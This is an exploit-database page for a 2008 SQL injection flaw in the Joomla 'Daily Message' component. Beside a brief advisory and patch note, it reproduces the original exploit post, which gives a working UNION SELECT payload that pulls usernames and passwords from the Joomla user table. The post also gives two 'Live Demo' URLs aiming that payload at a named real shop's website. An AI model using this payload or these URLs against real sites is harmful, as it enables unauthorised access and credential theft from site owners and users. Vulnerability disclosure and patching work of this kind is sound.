Joomla Component Daily Message (id) SQL Injection Vulnerability

vendor:

Daily Message

by:

H!tm@N

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Daily Message

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:daily_message:1.0.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component Daily Message (id) SQL Injection Vulnerability

A vulnerability exists in Joomla Component Daily Message (com_dailymessage) version 1.0.3, which allows an attacker to inject arbitrary SQL commands via the 'id' parameter in a GET request. An attacker can exploit this vulnerability to gain access to sensitive information from the database, such as usernames and passwords. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the component.

Source

Exploit-DB raw data:

#############################################################################
#							                    #
#      Joomla Component Daily Message (id) SQL Injection Vulnerability      #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Daily Message (com_dailymessage)"  
[~] Version:       "1.0.3 "
[~] Date:          "10/4/2005 "
[~] Author:        "Joseph LeBlanc"
[~] Author E-mail: "contact@jlleblanc.com"
[~] Author URL:    "www.jlleblanc.com"

########################################

[~] Exploit: /index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=[SQL]

[~] Example: /index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--

########################################

[~] Live Demo: http://www.drakbutiken.se/index.php?option=com_dailymessage&Itemid=31&page=faq&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--

[~] Live Demo: http://www.drakbutiken.se/index.php?option=com_dailymessage&Itemid=31&page=drivers&id=-7+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

# milw0rm.com [2008-10-22]